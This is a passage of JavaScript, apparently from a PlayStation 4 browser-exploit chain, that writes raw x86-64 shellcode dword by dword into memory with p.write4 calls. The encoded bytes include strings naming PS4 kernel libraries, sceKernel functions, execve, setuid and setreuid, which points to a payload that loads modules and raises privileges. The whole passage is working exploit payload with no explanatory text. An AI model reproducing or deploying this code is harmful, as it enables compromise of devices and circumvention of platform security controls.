267 | 	p.write4(reactPSPlus.add32(0x00000424), 0x7c8b4200);
268 | 	p.write4(reactPSPlus.add32(0x00000428), 0x8d49003d);
269 | 	p.write4(reactPSPlus.add32(0x0000042c), 0xb8480714);
270 | 	p.write4(reactPSPlus.add32(0x00000430), 0xfffffd8e);
271 | 	p.write4(reactPSPlus.add32(0x00000434), 0xffffffff);
272 | 	p.write4(reactPSPlus.add32(0x00000438), 0x07348d49);
273 | 	p.write4(reactPSPlus.add32(0x0000043c), 0xb848d3ff);
274 | 	p.write4(reactPSPlus.add32(0x00000440), 0x00000100);
275 | 	p.write4(reactPSPlus.add32(0x00000444), 0x00000000);
276 | 	p.write4(reactPSPlus.add32(0x00000448), 0x3d7c8b42);
277 | 	p.write4(reactPSPlus.add32(0x0000044c), 0x148d4900);
278 | 	p.write4(reactPSPlus.add32(0x00000450), 0x95b84807);
279 | 	p.write4(reactPSPlus.add32(0x00000454), 0xfffffffd);
280 | 	p.write4(reactPSPlus.add32(0x00000458), 0x49ffffff);
281 | 	p.write4(reactPSPlus.add32(0x0000045c), 0xff07348d);
282 | 	p.write4(reactPSPlus.add32(0x00000460), 0xd0b848d3);
283 | 	p.write4(reactPSPlus.add32(0x00000464), 0x00000000);
284 | 	p.write4(reactPSPlus.add32(0x00000468), 0x42000000);
285 | 	p.write4(reactPSPlus.add32(0x0000046c), 0x003d7c8b);
286 | 	p.write4(reactPSPlus.add32(0x00000470), 0x07148d49);
287 | 	p.write4(reactPSPlus.add32(0x00000474), 0xfda2b848);
288 | 	p.write4(reactPSPlus.add32(0x00000478), 0xffffffff);
289 | 	p.write4(reactPSPlus.add32(0x0000047c), 0x8d49ffff);
290 | 	p.write4(reactPSPlus.add32(0x00000480), 0xd3ff0734);
291 | 	p.write4(reactPSPlus.add32(0x00000484), 0x0108b848);
292 | 	p.write4(reactPSPlus.add32(0x00000488), 0x00000000);
293 | 	p.write4(reactPSPlus.add32(0x0000048c), 0x8b420000);
294 | 	p.write4(reactPSPlus.add32(0x00000490), 0x49003d7c);
295 | 	p.write4(reactPSPlus.add32(0x00000494), 0x4807148d);
296 | 	p.write4(reactPSPlus.add32(0x00000498), 0xfffdb9b8);
297 | 	p.write4(reactPSPlus.add32(0x0000049c), 0xffffffff);
298 | 	p.write4(reactPSPlus.add32(0x000004a0), 0x348d49ff);
299 | 	p.write4(reactPSPlus.add32(0x000004a4), 0x48d3ff07);
300 | 	p.write4(reactPSPlus.add32(0x000004a8), 0x000058b8);
301 | 	p.write4(reactPSPlus.add32(0x000004ac), 0x00000000);
302 | 	p.write4(reactPSPlus.add32(0x000004b0), 0x7c8b4200);
303 | 	p.write4(reactPSPlus.add32(0x000004b4), 0x8d49003d);
304 | 	p.write4(reactPSPlus.add32(0x000004b8), 0xb8480714);
305 | 	p.write4(reactPSPlus.add32(0x000004bc), 0xfffffdcf);
306 | 	p.write4(reactPSPlus.add32(0x000004c0), 0xffffffff);
307 | 	p.write4(reactPSPlus.add32(0x000004c4), 0x07348d49);
308 | 	p.write4(reactPSPlus.add32(0x000004c8), 0xb848d3ff);
309 | 	p.write4(reactPSPlus.add32(0x000004cc), 0x000000f8);
310 | 	p.write4(reactPSPlus.add32(0x000004d0), 0x00000000);
311 | 	p.write4(reactPSPlus.add32(0x000004d4), 0x3d7c8b42);
312 | 	p.write4(reactPSPlus.add32(0x000004d8), 0x148d4900);
313 | 	p.write4(reactPSPlus.add32(0x000004dc), 0xe5b84807);
314 | 	p.write4(reactPSPlus.add32(0x000004e0), 0xfffffffd);
315 | 	p.write4(reactPSPlus.add32(0x000004e4), 0x49ffffff);
316 | 	p.write4(reactPSPlus.add32(0x000004e8), 0xff07348d);
317 | 	p.write4(reactPSPlus.add32(0x000004ec), 0x20b848d3);
318 | 	p.write4(reactPSPlus.add32(0x000004f0), 0x00000001);
319 | 	p.write4(reactPSPlus.add32(0x000004f4), 0x42000000);
320 | 	p.write4(reactPSPlus.add32(0x000004f8), 0x003d7c8b);
321 | 	p.write4(reactPSPlus.add32(0x000004fc), 0x07148d49);
322 | 	p.write4(reactPSPlus.add32(0x00000500), 0xfdfbb848);
323 | 	p.write4(reactPSPlus.add32(0x00000504), 0xffffffff);
324 | 	p.write4(reactPSPlus.add32(0x00000508), 0x8d49ffff);
325 | 	p.write4(reactPSPlus.add32(0x0000050c), 0xd3ff0734);
326 | 	p.write4(reactPSPlus.add32(0x00000510), 0x0060b848);
327 | 	p.write4(reactPSPlus.add32(0x00000514), 0x00000000);
328 | 	p.write4(reactPSPlus.add32(0x00000518), 0x8b420000);
329 | 	p.write4(reactPSPlus.add32(0x0000051c), 0x49003d7c);
330 | 	p.write4(reactPSPlus.add32(0x00000520), 0x4807148d);
331 | 	p.write4(reactPSPlus.add32(0x00000524), 0xfffe11b8);
332 | 	p.write4(reactPSPlus.add32(0x00000528), 0xffffffff);
333 | 	p.write4(reactPSPlus.add32(0x0000052c), 0x348d49ff);
334 | 	p.write4(reactPSPlus.add32(0x00000530), 0x48d3ff07);
335 | 	p.write4(reactPSPlus.add32(0x00000534), 0x000020b8);
336 | 	p.write4(reactPSPlus.add32(0x00000538), 0x00000000);
337 | 	p.write4(reactPSPlus.add32(0x0000053c), 0x7c8b4200);
338 | 	p.write4(reactPSPlus.add32(0x00000540), 0x8d49003d);
339 | 	p.write4(reactPSPlus.add32(0x00000544), 0xb8480714);
340 | 	p.write4(reactPSPlus.add32(0x00000548), 0xfffffe18);
341 | 	p.write4(reactPSPlus.add32(0x0000054c), 0xffffffff);
342 | 	p.write4(reactPSPlus.add32(0x00000550), 0x07348d49);
343 | 	p.write4(reactPSPlus.add32(0x00000554), 0xb848d3ff);
344 | 	p.write4(reactPSPlus.add32(0x00000558), 0x00000040);
345 | 	p.write4(reactPSPlus.add32(0x0000055c), 0x00000000);
346 | 	p.write4(reactPSPlus.add32(0x00000560), 0x3d7c8b42);
347 | 	p.write4(reactPSPlus.add32(0x00000564), 0x148d4900);
348 | 	p.write4(reactPSPlus.add32(0x00000568), 0x1fb84807);
349 | 	p.write4(reactPSPlus.add32(0x0000056c), 0xfffffffe);
350 | 	p.write4(reactPSPlus.add32(0x00000570), 0x49ffffff);
351 | 	p.write4(reactPSPlus.add32(0x00000574), 0xff07348d);
352 | 	p.write4(reactPSPlus.add32(0x00000578), 0x18b848d3);
353 | 	p.write4(reactPSPlus.add32(0x0000057c), 0x00000001);
354 | 	p.write4(reactPSPlus.add32(0x00000580), 0x42000000);
355 | 	p.write4(reactPSPlus.add32(0x00000584), 0x003d7c8b);
356 | 	p.write4(reactPSPlus.add32(0x00000588), 0x07148d49);
357 | 	p.write4(reactPSPlus.add32(0x0000058c), 0xfe26b848);
358 | 	p.write4(reactPSPlus.add32(0x00000590), 0xffffffff);
359 | 	p.write4(reactPSPlus.add32(0x00000594), 0x8d49ffff);
360 | 	p.write4(reactPSPlus.add32(0x00000598), 0xd3ff0734);
361 | 	p.write4(reactPSPlus.add32(0x0000059c), 0x00a8b848);
362 | 	p.write4(reactPSPlus.add32(0x000005a0), 0x00000000);
363 | 	p.write4(reactPSPlus.add32(0x000005a4), 0x8b420000);
364 | 	p.write4(reactPSPlus.add32(0x000005a8), 0x49003d7c);
365 | 	p.write4(reactPSPlus.add32(0x000005ac), 0x4807148d);
366 | 	p.write4(reactPSPlus.add32(0x000005b0), 0xfffe2db8);
367 | 	p.write4(reactPSPlus.add32(0x000005b4), 0xffffffff);
368 | 	p.write4(reactPSPlus.add32(0x000005b8), 0x348d49ff);
369 | 	p.write4(reactPSPlus.add32(0x000005bc), 0x48d3ff07);
370 | 	p.write4(reactPSPlus.add32(0x000005c0), 0x0000e0b8);
371 | 	p.write4(reactPSPlus.add32(0x000005c4), 0x00000000);
372 | 	p.write4(reactPSPlus.add32(0x000005c8), 0x7c8b4200);
373 | 	p.write4(reactPSPlus.add32(0x000005cc), 0x8d49003d);
374 | 	p.write4(reactPSPlus.add32(0x000005d0), 0xb8480714);
375 | 	p.write4(reactPSPlus.add32(0x000005d4), 0xfffffe34);
376 | 	p.write4(reactPSPlus.add32(0x000005d8), 0xffffffff);
377 | 	p.write4(reactPSPlus.add32(0x000005dc), 0x07348d49);
378 | 	p.write4(reactPSPlus.add32(0x000005e0), 0xb848d3ff);
379 | 	p.write4(reactPSPlus.add32(0x000005e4), 0x00000098);
380 | 	p.write4(reactPSPlus.add32(0x000005e8), 0x00000000);
381 | 	p.write4(reactPSPlus.add32(0x000005ec), 0x3d7c8b42);
382 | 	p.write4(reactPSPlus.add32(0x000005f0), 0x148d4900);
383 | 	p.write4(reactPSPlus.add32(0x000005f4), 0xc4834807);
384 | 	p.write4(reactPSPlus.add32(0x000005f8), 0x3db84808);
385 | 	p.write4(reactPSPlus.add32(0x000005fc), 0xfffffffe);
386 | 	p.write4(reactPSPlus.add32(0x00000600), 0x49ffffff);
387 | 	p.write4(reactPSPlus.add32(0x00000604), 0x4807348d);
388 | 	p.write4(reactPSPlus.add32(0x00000608), 0x5d5bd889);
389 | 	p.write4(reactPSPlus.add32(0x0000060c), 0x5f415c41);
390 | 	p.write4(reactPSPlus.add32(0x00000610), 0x0f66e0ff);
391 | 	p.write4(reactPSPlus.add32(0x00000614), 0x0000441f);
392 | 	p.write4(reactPSPlus.add32(0x00000618), 0xfc16b848);
393 | 	p.write4(reactPSPlus.add32(0x0000061c), 0xffffffff);
394 | 	p.write4(reactPSPlus.add32(0x00000620), 0x8d4affff);
395 | 	p.write4(reactPSPlus.add32(0x00000624), 0x49003d74);
396 | 	p.write4(reactPSPlus.add32(0x00000628), 0xff073c8d);
397 | 	p.write4(reactPSPlus.add32(0x0000062c), 0x0fc085d3);
398 | 	p.write4(reactPSPlus.add32(0x00000630), 0xfffb2784);
399 | 	p.write4(reactPSPlus.add32(0x00000634), 0x29b848ff);
400 | 	p.write4(reactPSPlus.add32(0x00000638), 0xfffffffc);
401 | 	p.write4(reactPSPlus.add32(0x0000063c), 0x4affffff);
402 | 	p.write4(reactPSPlus.add32(0x00000640), 0x003d748d);
403 | 	p.write4(reactPSPlus.add32(0x00000644), 0x073c8d49);
404 | 	p.write4(reactPSPlus.add32(0x00000648), 0x0de9d3ff);
405 | 	p.write4(reactPSPlus.add32(0x0000064c), 0x90fffffb);
406 | 	p.write4(reactPSPlus.add32(0x00000650), 0x4fc0c748);
407 | 	p.write4(reactPSPlus.add32(0x00000654), 0xe9000002);
408 | 	p.write4(reactPSPlus.add32(0x00000658), 0xfffffa49);
409 | 	p.write4(reactPSPlus.add32(0x0000065c), 0x50c0c748);
410 | 	p.write4(reactPSPlus.add32(0x00000660), 0xe9000002);
411 | 	p.write4(reactPSPlus.add32(0x00000664), 0xfffffa3d);
412 | 	p.write4(reactPSPlus.add32(0x00000668), 0x00841f0f);
413 | 	p.write4(reactPSPlus.add32(0x0000066c), 0x00000000);
414 | 	p.write4(reactPSPlus.add32(0x00000670), 0x0530bb49);
415 | 	p.write4(reactPSPlus.add32(0x00000674), 0x00000000);
416 | 	p.write4(reactPSPlus.add32(0x00000678), 0x8d480000);
417 | 	p.write4(reactPSPlus.add32(0x0000067c), 0xffffef0d);
418 | 	p.write4(reactPSPlus.add32(0x00000680), 0x4c5741ff);
419 | 	p.write4(reactPSPlus.add32(0x00000684), 0xc748d901);
420 | 	p.write4(reactPSPlus.add32(0x00000688), 0x00016006);
421 | 	p.write4(reactPSPlus.add32(0x0000068c), 0x02b84900);
422 | 	p.write4(reactPSPlus.add32(0x00000690), 0xfffffff5);
423 | 	p.write4(reactPSPlus.add32(0x00000694), 0x48ffffff);
424 | 	p.write4(reactPSPlus.add32(0x00000698), 0x8949f289);
425 | 	p.write4(reactPSPlus.add32(0x0000069c), 0x31fe89cf);
426 | 	p.write4(reactPSPlus.add32(0x000006a0), 0x0251bfc0);
427 | 	p.write4(reactPSPlus.add32(0x000006a4), 0x01490000);
428 | 	p.write4(reactPSPlus.add32(0x000006a8), 0xd0ff41c8);
429 | 	p.write4(reactPSPlus.add32(0x000006ac), 0x90c35f41);
430 | 	p.write4(reactPSPlus.add32(0x000006b0), 0x04f0bb49);
431 | 	p.write4(reactPSPlus.add32(0x000006b4), 0x00000000);
432 | 	p.write4(reactPSPlus.add32(0x000006b8), 0x8d4c0000);
433 | 	p.write4(reactPSPlus.add32(0x000006bc), 0xffffef0d);
434 | 	p.write4(reactPSPlus.add32(0x000006c0), 0xd9014dff);
435 | 	p.write4(reactPSPlus.add32(0x000006c4), 0xf502ba49);
436 | 	p.write4(reactPSPlus.add32(0x000006c8), 0xffffffff);
437 | 	p.write4(reactPSPlus.add32(0x000006cc), 0x5741ffff);
438 | 	p.write4(reactPSPlus.add32(0x000006d0), 0x4df18948);
439 | 	p.write4(reactPSPlus.add32(0x000006d4), 0x8948cf89);
440 | 	p.write4(reactPSPlus.add32(0x000006d8), 0xc03145fe);
441 | 	p.write4(reactPSPlus.add32(0x000006dc), 0x52bfd231);
442 | 	p.write4(reactPSPlus.add32(0x000006e0), 0x31000002);
443 | 	p.write4(reactPSPlus.add32(0x000006e4), 0xca014dc0);
444 | 	p.write4(reactPSPlus.add32(0x000006e8), 0x41d2ff41);
445 | 	p.write4(reactPSPlus.add32(0x000006ec), 0x9066c35f);
446 | 	p.write4(reactPSPlus.add32(0x000006f0), 0x04b0bb49);
447 | 	p.write4(reactPSPlus.add32(0x000006f4), 0x00000000);
448 | 	p.write4(reactPSPlus.add32(0x000006f8), 0x8d4c0000);
449 | 	p.write4(reactPSPlus.add32(0x000006fc), 0xffffef05);
450 | 	p.write4(reactPSPlus.add32(0x00000700), 0xd8014dff);
451 | 	p.write4(reactPSPlus.add32(0x00000704), 0xf502b949);
452 | 	p.write4(reactPSPlus.add32(0x00000708), 0xffffffff);
453 | 	p.write4(reactPSPlus.add32(0x0000070c), 0x5741ffff);
454 | 	p.write4(reactPSPlus.add32(0x00000710), 0x894dfe89);
455 | 	p.write4(reactPSPlus.add32(0x00000714), 0x31c931c7);
456 | 	p.write4(reactPSPlus.add32(0x00000718), 0x0253bfd2);
457 | 	p.write4(reactPSPlus.add32(0x0000071c), 0xc0310000);
458 | 	p.write4(reactPSPlus.add32(0x00000720), 0x41c1014d);
459 | 	p.write4(reactPSPlus.add32(0x00000724), 0x5f41d1ff);
460 | 	p.write4(reactPSPlus.add32(0x00000728), 0x801f0fc3);
461 | 	p.write4(reactPSPlus.add32(0x0000072c), 0x00000000);
462 | 	p.write4(reactPSPlus.add32(0x00000730), 0xbb495741);
463 | 	p.write4(reactPSPlus.add32(0x00000734), 0x00000470);
464 | 	p.write4(reactPSPlus.add32(0x00000738), 0x00000000);
465 | 	p.write4(reactPSPlus.add32(0x0000073c), 0x1d8d4853);
466 | 	p.write4(reactPSPlus.add32(0x00000740), 0xffffffec);
467 | 	p.write4(reactPSPlus.add32(0x00000744), 0x48db014c);
468 | 	p.write4(reactPSPlus.add32(0x00000748), 0xfffff8b8);
469 | 	p.write4(reactPSPlus.add32(0x0000074c), 0xffffffff);
470 | 	p.write4(reactPSPlus.add32(0x00000750), 0xec8348ff);
471 | 	p.write4(reactPSPlus.add32(0x00000754), 0x048b4808);
472 | 	p.write4(reactPSPlus.add32(0x00000758), 0x46bf4803);
473 | 	p.write4(reactPSPlus.add32(0x0000075c), 0xfffffffe);
474 | 	p.write4(reactPSPlus.add32(0x00000760), 0x48ffffff);
475 | 	p.write4(reactPSPlus.add32(0x00000764), 0xc931df01);
476 | 	p.write4(reactPSPlus.add32(0x00000768), 0xf631d231);
477 | 	p.write4(reactPSPlus.add32(0x0000076c), 0x45c93145);
478 | 	p.write4(reactPSPlus.add32(0x00000770), 0x10ffc031);
479 | 	p.write4(reactPSPlus.add32(0x00000774), 0x08c48348);
480 | 	p.write4(reactPSPlus.add32(0x00000778), 0x0130ba48);
481 | 	p.write4(reactPSPlus.add32(0x0000077c), 0x00000000);
482 | 	p.write4(reactPSPlus.add32(0x00000780), 0xb9480000);
483 | 	p.write4(reactPSPlus.add32(0x00000784), 0xfffffe5b);
484 | 	p.write4(reactPSPlus.add32(0x00000788), 0xffffffff);
485 | 	p.write4(reactPSPlus.add32(0x0000078c), 0xb848c789);
486 | 	p.write4(reactPSPlus.add32(0x00000790), 0xfffffab0);
487 | 	p.write4(reactPSPlus.add32(0x00000794), 0xffffffff);
488 | 	p.write4(reactPSPlus.add32(0x00000798), 0x48da0148);
489 | 	p.write4(reactPSPlus.add32(0x0000079c), 0x480b348d);
490 | 	p.write4(reactPSPlus.add32(0x000007a0), 0x415bd801);
491 | 	p.write4(reactPSPlus.add32(0x000007a4), 0x6ce0ff5f);
492 | 	p.write4(reactPSPlus.add32(0x000007a8), 0x656b6269);
493 | 	p.write4(reactPSPlus.add32(0x000007ac), 0x6c656e72);
494 | 	p.write4(reactPSPlus.add32(0x000007b0), 0x7270732e);
495 | 	p.write4(reactPSPlus.add32(0x000007b4), 0x696c0078);
496 | 	p.write4(reactPSPlus.add32(0x000007b8), 0x72656b62);
497 | 	p.write4(reactPSPlus.add32(0x000007bc), 0x5f6c656e);
498 | 	p.write4(reactPSPlus.add32(0x000007c0), 0x2e626577);
499 | 	p.write4(reactPSPlus.add32(0x000007c4), 0x78727073);
500 | 	p.write4(reactPSPlus.add32(0x000007c8), 0x62696c00);
501 | 	p.write4(reactPSPlus.add32(0x000007cc), 0x6e72656b);
502 | 	p.write4(reactPSPlus.add32(0x000007d0), 0x735f6c65);
503 | 	p.write4(reactPSPlus.add32(0x000007d4), 0x732e7379);
504 | 	p.write4(reactPSPlus.add32(0x000007d8), 0x00787270);
505 | 	p.write4(reactPSPlus.add32(0x000007dc), 0x74735f5f);
506 | 	p.write4(reactPSPlus.add32(0x000007e0), 0x5f6b6361);
507 | 	p.write4(reactPSPlus.add32(0x000007e4), 0x5f6b6863);
508 | 	p.write4(reactPSPlus.add32(0x000007e8), 0x72617567);
509 | 	p.write4(reactPSPlus.add32(0x000007ec), 0x5f5f0064);
510 | 	p.write4(reactPSPlus.add32(0x000007f0), 0x63617473);
511 | 	p.write4(reactPSPlus.add32(0x000007f4), 0x68635f6b);
512 | 	p.write4(reactPSPlus.add32(0x000007f8), 0x61665f6b);
513 | 	p.write4(reactPSPlus.add32(0x000007fc), 0x5f006c69);
514 | 	p.write4(reactPSPlus.add32(0x00000800), 0x7272655f);
515 | 	p.write4(reactPSPlus.add32(0x00000804), 0x7300726f);
516 | 	p.write4(reactPSPlus.add32(0x00000808), 0x654b6563);
517 | 	p.write4(reactPSPlus.add32(0x0000080c), 0x6c656e72);
518 | 	p.write4(reactPSPlus.add32(0x00000810), 0x6f727245);
519 | 	p.write4(reactPSPlus.add32(0x00000814), 0x63730072);
520 | 	p.write4(reactPSPlus.add32(0x00000818), 0x72654b65);
521 | 	p.write4(reactPSPlus.add32(0x0000081c), 0x4c6c656e);
522 | 	p.write4(reactPSPlus.add32(0x00000820), 0x5364616f);
523 | 	p.write4(reactPSPlus.add32(0x00000824), 0x74726174);
524 | 	p.write4(reactPSPlus.add32(0x00000828), 0x75646f4d);
525 | 	p.write4(reactPSPlus.add32(0x0000082c), 0x7300656c);
526 | 	p.write4(reactPSPlus.add32(0x00000830), 0x654b6563);
527 | 	p.write4(reactPSPlus.add32(0x00000834), 0x6c656e72);
528 | 	p.write4(reactPSPlus.add32(0x00000838), 0x6f6c6c41);
529 | 	p.write4(reactPSPlus.add32(0x0000083c), 0x65746163);
530 | 	p.write4(reactPSPlus.add32(0x00000840), 0x65726944);
531 | 	p.write4(reactPSPlus.add32(0x00000844), 0x654d7463);
532 | 	p.write4(reactPSPlus.add32(0x00000848), 0x79726f6d);
533 | 	p.write4(reactPSPlus.add32(0x0000084c), 0x65637300);
534 | 	p.write4(reactPSPlus.add32(0x00000850), 0x6e72654b);
535 | 	p.write4(reactPSPlus.add32(0x00000854), 0x614d6c65);
536 | 	p.write4(reactPSPlus.add32(0x00000858), 0x72694470);
537 | 	p.write4(reactPSPlus.add32(0x0000085c), 0x4d746365);
538 | 	p.write4(reactPSPlus.add32(0x00000860), 0x726f6d65);
539 | 	p.write4(reactPSPlus.add32(0x00000864), 0x63730079);
540 | 	p.write4(reactPSPlus.add32(0x00000868), 0x72654b65);
541 | 	p.write4(reactPSPlus.add32(0x0000086c), 0x536c656e);
542 | 	p.write4(reactPSPlus.add32(0x00000870), 0x00746174);
543 | 	p.write4(reactPSPlus.add32(0x00000874), 0x4b656373);
544 | 	p.write4(reactPSPlus.add32(0x00000878), 0x656e7265);
545 | 	p.write4(reactPSPlus.add32(0x0000087c), 0x65704f6c);
546 | 	p.write4(reactPSPlus.add32(0x00000880), 0x6373006e);
547 | 	p.write4(reactPSPlus.add32(0x00000884), 0x72654b65);
548 | 	p.write4(reactPSPlus.add32(0x00000888), 0x526c656e);
549 | 	p.write4(reactPSPlus.add32(0x0000088c), 0x00646165);
550 | 	p.write4(reactPSPlus.add32(0x00000890), 0x4b656373);
551 | 	p.write4(reactPSPlus.add32(0x00000894), 0x656e7265);
552 | 	p.write4(reactPSPlus.add32(0x00000898), 0x65734c6c);
553 | 	p.write4(reactPSPlus.add32(0x0000089c), 0x73006b65);
554 | 	p.write4(reactPSPlus.add32(0x000008a0), 0x654b6563);
555 | 	p.write4(reactPSPlus.add32(0x000008a4), 0x6c656e72);
556 | 	p.write4(reactPSPlus.add32(0x000008a8), 0x736f6c43);
557 | 	p.write4(reactPSPlus.add32(0x000008ac), 0x63730065);
558 | 	p.write4(reactPSPlus.add32(0x000008b0), 0x72654b65);
559 | 	p.write4(reactPSPlus.add32(0x000008b4), 0x536c656e);
560 | 	p.write4(reactPSPlus.add32(0x000008b8), 0x7065656c);
561 | 	p.write4(reactPSPlus.add32(0x000008bc), 0x65637300);
562 | 	p.write4(reactPSPlus.add32(0x000008c0), 0x6e72654b);
563 | 	p.write4(reactPSPlus.add32(0x000008c4), 0x73556c65);
564 | 	p.write4(reactPSPlus.add32(0x000008c8), 0x7065656c);
565 | 	p.write4(reactPSPlus.add32(0x000008cc), 0x65637300);
566 | 	p.write4(reactPSPlus.add32(0x000008d0), 0x6e72654b);
567 | 	p.write4(reactPSPlus.add32(0x000008d4), 0x65476c65);
568 | 	p.write4(reactPSPlus.add32(0x000008d8), 0x6d697474);
569 | 	p.write4(reactPSPlus.add32(0x000008dc), 0x64666f65);
570 | 	p.write4(reactPSPlus.add32(0x000008e0), 0x73007961);
571 | 	p.write4(reactPSPlus.add32(0x000008e4), 0x654b6563);
572 | 	p.write4(reactPSPlus.add32(0x000008e8), 0x6c656e72);
573 | 	p.write4(reactPSPlus.add32(0x000008ec), 0x50746547);
574 | 	p.write4(reactPSPlus.add32(0x000008f0), 0x65636f72);
575 | 	p.write4(reactPSPlus.add32(0x000008f4), 0x69547373);
576 | 	p.write4(reactPSPlus.add32(0x000008f8), 0x7300656d);
577 | 	p.write4(reactPSPlus.add32(0x000008fc), 0x654b6563);
578 | 	p.write4(reactPSPlus.add32(0x00000900), 0x6c656e72);
579 | 	p.write4(reactPSPlus.add32(0x00000904), 0x43746547);
580 | 	p.write4(reactPSPlus.add32(0x00000908), 0x65727275);
581 | 	p.write4(reactPSPlus.add32(0x0000090c), 0x7043746e);
582 | 	p.write4(reactPSPlus.add32(0x00000910), 0x79730075);
583 | 	p.write4(reactPSPlus.add32(0x00000914), 0x6c746373);
584 | 	p.write4(reactPSPlus.add32(0x00000918), 0x73797300);
585 | 	p.write4(reactPSPlus.add32(0x0000091c), 0x626c7463);
586 | 	p.write4(reactPSPlus.add32(0x00000920), 0x6d616e79);
587 | 	p.write4(reactPSPlus.add32(0x00000924), 0x79730065);
588 | 	p.write4(reactPSPlus.add32(0x00000928), 0x63726173);
589 | 	p.write4(reactPSPlus.add32(0x0000092c), 0x78650068);
590 | 	p.write4(reactPSPlus.add32(0x00000930), 0x65766365);
591 | 	p.write4(reactPSPlus.add32(0x00000934), 0x68747000);
592 | 	p.write4(reactPSPlus.add32(0x00000938), 0x64616572);
593 | 	p.write4(reactPSPlus.add32(0x0000093c), 0x6c65735f);
594 | 	p.write4(reactPSPlus.add32(0x00000940), 0x74700066);
595 | 	p.write4(reactPSPlus.add32(0x00000944), 0x61657268);
596 | 	p.write4(reactPSPlus.add32(0x00000948), 0x65735f64);
597 | 	p.write4(reactPSPlus.add32(0x0000094c), 0x66666174);
598 | 	p.write4(reactPSPlus.add32(0x00000950), 0x74696e69);
599 | 	p.write4(reactPSPlus.add32(0x00000954), 0x706e5f79);
600 | 	p.write4(reactPSPlus.add32(0x00000958), 0x65637300);
601 | 	p.write4(reactPSPlus.add32(0x0000095c), 0x6e72654b);
602 | 	p.write4(reactPSPlus.add32(0x00000960), 0x72436c65);
603 | 	p.write4(reactPSPlus.add32(0x00000964), 0x65746165);
604 | 	p.write4(reactPSPlus.add32(0x00000968), 0x65757145);
605 | 	p.write4(reactPSPlus.add32(0x0000096c), 0x73006575);
606 | 	p.write4(reactPSPlus.add32(0x00000970), 0x654b6563);
607 | 	p.write4(reactPSPlus.add32(0x00000974), 0x6c656e72);
608 | 	p.write4(reactPSPlus.add32(0x00000978), 0x656c6544);
609 | 	p.write4(reactPSPlus.add32(0x0000097c), 0x71456574);
610 | 	p.write4(reactPSPlus.add32(0x00000980), 0x65756575);
611 | 	p.write4(reactPSPlus.add32(0x00000984), 0x65637300);
612 | 	p.write4(reactPSPlus.add32(0x00000988), 0x6e72654b);
613 | 	p.write4(reactPSPlus.add32(0x0000098c), 0x64416c65);
614 | 	p.write4(reactPSPlus.add32(0x00000990), 0x65735564);
615 | 	p.write4(reactPSPlus.add32(0x00000994), 0x65764572);
616 | 	p.write4(reactPSPlus.add32(0x00000998), 0x7300746e);
617 | 	p.write4(reactPSPlus.add32(0x0000099c), 0x654b6563);
618 | 	p.write4(reactPSPlus.add32(0x000009a0), 0x6c656e72);
619 | 	p.write4(reactPSPlus.add32(0x000009a4), 0x52646441);
620 | 	p.write4(reactPSPlus.add32(0x000009a8), 0x45646165);
621 | 	p.write4(reactPSPlus.add32(0x000009ac), 0x746e6576);
622 | 	p.write4(reactPSPlus.add32(0x000009b0), 0x74656700);
623 | 	p.write4(reactPSPlus.add32(0x000009b4), 0x00646975);
624 | 	p.write4(reactPSPlus.add32(0x000009b8), 0x67746567);
625 | 	p.write4(reactPSPlus.add32(0x000009bc), 0x67006469);
626 | 	p.write4(reactPSPlus.add32(0x000009c0), 0x69707465);
627 | 	p.write4(reactPSPlus.add32(0x000009c4), 0x65730064);
628 | 	p.write4(reactPSPlus.add32(0x000009c8), 0x64697574);
629 | 	p.write4(reactPSPlus.add32(0x000009cc), 0x74657300);
630 | 	p.write4(reactPSPlus.add32(0x000009d0), 0x00646967);
631 | 	p.write4(reactPSPlus.add32(0x000009d4), 0x72746573);
632 | 	p.write4(reactPSPlus.add32(0x000009d8), 0x64697565);
633 | 	p.write4(reactPSPlus.add32(0x000009dc), 0x74657300);
634 | 	p.write4(reactPSPlus.add32(0x000009e0), 0x69676572);
635 | 	p.write4(reactPSPlus.add32(0x000009e4), 0x696c0064);
636 | 	p.write4(reactPSPlus.add32(0x000009e8), 0x65635362);
637 | 	p.write4(reactPSPlus.add32(0x000009ec), 0x6d737953);
638 | 	p.write4(reactPSPlus.add32(0x000009f0), 0x6c75646f);
639 | 	p.write4(reactPSPlus.add32(0x000009f4), 0x70732e65);
640 | 	p.write4(reactPSPlus.add32(0x000009f8), 0x73007872);
641 | 	p.write4(reactPSPlus.add32(0x000009fc), 0x79536563);
642 | 	p.write4(reactPSPlus.add32(0x00000a00), 0x646f6d73);
643 | 	p.write4(reactPSPlus.add32(0x00000a04), 0x4c656c75);
644 | 	p.write4(reactPSPlus.add32(0x00000a08), 0x4d64616f);
645 | 	p.write4(reactPSPlus.add32(0x00000a0c), 0x6c75646f);
646 | 	p.write4(reactPSPlus.add32(0x00000a10), 0x6c2f0065);
647 | 	p.write4(reactPSPlus.add32(0x00000a14), 0x34366269);
648 | 	p.write4(reactPSPlus.add32(0x00000a18), 0x2d646c2f);
649 | 	p.write4(reactPSPlus.add32(0x00000a1c), 0x756e696c);
650 | 	p.write4(reactPSPlus.add32(0x00000a20), 0x38782d78);
651 | 	p.write4(reactPSPlus.add32(0x00000a24), 0x34362d36);
652 | 	p.write4(reactPSPlus.add32(0x00000a28), 0x2e6f732e);
653 | 	p.write4(reactPSPlus.add32(0x00000a2c), 0x00000032);
654 | 	p.write4(reactPSPlus.add32(0x00000a30), 0x00000000);
655 | 	p.write4(reactPSPlus.add32(0x00000a34), 0x00000000);
656 | 	p.write4(reactPSPlus.add32(0x00000a38), 0x00000000);
657 | 	p.write4(reactPSPlus.add32(0x00000a3c), 0x00000000);
658 | 	p.write4(reactPSPlus.add32(0x00000a40), 0x00000000);
659 | 	p.write4(reactPSPlus.add32(0x00000a44), 0x00000000);
660 | 	p.write4(reactPSPlus.add32(0x00000a48), 0x00000000);
661 | 	p.write4(reactPSPlus.add32(0x00000a4c), 0x00000000);
662 | 	p.write4(reactPSPlus.add32(0x00000a50), 0x00000001);
663 | 	p.write4(reactPSPlus.add32(0x00000a54), 0x00000001);
664 | 	p.write4(reactPSPlus.add32(0x00000a58), 0x00000001);
665 | 	p.write4(reactPSPlus.add32(0x00000a5c), 0x00000000);
666 | 	p.write4(reactPSPlus.add32(0x00000a60), 0x00000000);
667 | 	p.write4(reactPSPlus.add32(0x00000a64), 0x00000000);
668 | 	p.write4(reactPSPlus.add32(0x00000a68), 0x00000000);
669 | 	p.write4(reactPSPlus.add32(0x00000a6c), 0x00000000);
670 | 	p.write4(reactPSPlus.add32(0x00000a70), 0x26200b98);
671 | 	p.write4(reactPSPlus.add32(0x00000a74), 0x00000009);
672 | 	p.write4(reactPSPlus.add32(0x00000a78), 0x00000008);
